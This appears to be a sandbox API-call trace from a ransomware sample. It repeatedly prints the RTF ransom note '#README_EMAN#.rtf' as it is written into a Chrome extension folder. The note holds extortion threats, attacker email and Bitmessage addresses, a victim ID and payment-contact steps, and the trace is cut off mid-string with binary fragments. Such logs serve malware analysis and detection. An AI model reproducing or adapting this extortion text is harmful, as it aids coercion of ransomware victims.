COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.040] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nSë\x91W[d¼\"òÈF\x17þê\x89|ó¢kö\x97pcÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.040] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.040] CloseHandle (hObject=0x294) returned 1 [0285.041] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_ca\\#readme_eman#.rtf")) returned 0xffffffff [0285.041] GetLastError () returned 0x2 [0285.041] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_ca\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.041] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r 